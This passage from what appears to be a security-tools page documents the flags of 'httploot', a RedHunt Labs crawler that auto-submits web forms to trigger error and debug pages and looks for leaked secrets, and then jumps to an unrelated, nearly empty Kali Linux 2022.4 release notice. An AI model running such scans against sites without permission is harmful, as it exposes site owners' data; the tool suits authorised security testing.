  • -parallelism: Specifies the number of links per site to crawl in parallel.

Both -concurrency and -parallelism are crucial to the performance and reliability of the tool's results.

Crawling

The crawl depth can be specified using the -depth flag. The integer value supplied is the maximum depth of link chains to follow from a site.

An important flag -wildcard-crawl can be used to specify whether to crawl URLs outside the domain in scope.

NOTE: Using this flag might lead to infinite crawling in the worst case, if the crawler continuously finds links to other domains.

Filling forms

If you want the tool to scan for debug pages, you need to specify the -submit-forms argument. This will direct the tool to autosubmit forms and try to trigger error/debug pages once a tech stack has been identified successfully.

If the -submit-forms flag is enabled, you can control the string submitted in the form fields. The -form-string flag specifies the string to be submitted, while -form-length controls the length of the randomly generated string that will be filled into the forms.

Network tuning

Flags like:

  • -timeout - specifies the HTTP timeout of requests.
  • -user-agent - specifies the user-agent to use in HTTP requests.
  • -verify-ssl - specifies whether or not to verify SSL certificates.

Input/Output

The input file to read can be specified using the -input-file argument; supply a file path containing the list of URLs to scan. The -output-file flag can be used to specify the result output file path, which by default is httploot-results.csv.
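
Putting the flags together, a typical invocation might look like this (file names are illustrative):

$ ./httploot -input-file targets.txt -depth 2 -submit-forms -output-file loot.csv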

Further Details

Further details about the research which led to the development of the tool can be found on our RedHunt Labs Blog.

License & Version

The tool is licensed under the MIT license. See LICENSE.

Currently the tool is at v0.1.

Credits

The RedHunt Labs Research Team would like to extend credits to the creators & maintainers of shhgit for the regular expressions provided by them in their repository.

To know more about our Attack Surface Management platform, check out NVADR.



Kali Linux 2022.4 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2022.4. This release has various impressive updates.

A summary of the changelog since August’s 2022.3 release:


More info here.

